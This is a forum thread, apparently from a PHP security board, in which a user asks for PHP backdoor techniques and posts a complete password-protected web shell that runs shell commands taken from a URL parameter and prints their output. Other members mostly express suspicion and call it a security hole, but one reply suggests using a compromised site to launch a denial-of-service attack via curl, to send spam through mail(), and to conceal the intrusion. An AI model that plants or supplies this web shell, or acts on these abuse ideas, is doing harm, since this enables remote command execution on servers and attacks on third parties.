PHP Backdoor

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
php_hacker
Forum Newbie
Posts: 7
Joined: Mon Mar 07, 2005 3:44 pm

PHP Backdoor

Post by php_hacker »

Hello guys,

I know some member may not support this topic, but i would like to know your suggestions about the project of making a PHP Backdoor.

I would like to know your techniques and ideas about this Backdoor just for knowledge.

I am also against such kind of things but sharing knowledge may protect us from future attacks.
php_hacker
Forum Newbie
Posts: 7
Joined: Mon Mar 07, 2005 3:44 pm

Post by php_hacker »

This is a sample of backdoor, but it need shell access enabled.
So webmasters having shared account will not have any problem..

Code: Select all

<?php 
echo "<html>\n<head>\n<title>Don't let BWall find you using this.</title>\n"; 
$b = $_GET["cmd"]; 
$pass = $_GET["pwd"]; 
$optpre = $_GET["pre"]; 
if (MD5($pass) == "2ffe4e77321d9a7152f7016ea7aa5114") 
{ 
    echo "</head>\n<body bgColor=#000000 text=#FF0000>"; 
    if ($optpre == "yes") 
    { 
        $output = shell_exec($b); 
        echo "<pre>$output</pre>";         
    }else 
    {     
        $output = shell_exec($b); 
        echo "$output";     
    } 

}else 
{ 
    echo "<META HTTP-EQUIV=\"Refresh\" CONTENT=\"0; URL=http://\">\n"; 
    echo "</head>\n<body bgColor=#000000 text=#FF0000>"; 
} 

?> 
</body> 
</html>
I found this one long time back, but there maybe some backdoors which may run without shell access.
User avatar
Chris Corbyn
Breakbeat Nuttzer
Posts: 13098
Joined: Wed Mar 24, 2004 7:57 am
Location: Melbourne, Australia

Post by Chris Corbyn »

Hmmm.... I'm looking at your username... then at the question... then at your username..... :lol: :lol:

This probably more of a question for the PHP Security forum on this site but whether or not anybody will answer I dont know.

I think some guys will be a bit reluctant to answer this... it may well even be removed depending upon how the thread progresses 8O
User avatar
feyd
Neighborhood Spidermoddy
Posts: 31559
Joined: Mon Mar 29, 2004 3:24 pm
Location: Bothell, Washington, USA

Post by feyd »

considering the security hole that makes without any validation or verification (really) .. I'd say really really really bad.

Moved to Security.
d3ad1ysp0rk
Forum Donator
Posts: 1661
Joined: Mon Oct 20, 2003 8:31 pm
Location: Maine, USA

Post by d3ad1ysp0rk »

Who would allow users to send SHELL commands through the URL?

So far, I haven't found much of a need for shell commands at all in PHP. Most things can be done with PHP built in functions..

I wouldn't really call this a backdoor as much as a bad programmer.
php_hacker
Forum Newbie
Posts: 7
Joined: Mon Mar 07, 2005 3:44 pm

Post by php_hacker »

This PHP backdoor is useless stuff man.
It was just an idea to share my thoughts though.
User avatar
Ambush Commander
DevNet Master
Posts: 3698
Joined: Mon Oct 25, 2004 9:29 pm
Location: New Jersey, US

Post by Ambush Commander »

You're probably going to need shell access to do any real damage.

Although you could probably set up a DOS script using Curl or something if each script refers back to a configuration file (then whenever someone accesses the page, they send a hit somewhere.

What you could also do is abuse their mail() function, sending spam with a similar method.

A backdoor... that's going to be difficult though. Better off making it seem like you never got in at all. If you got in the first place, it's probably because of a bad password or something.
Post Reply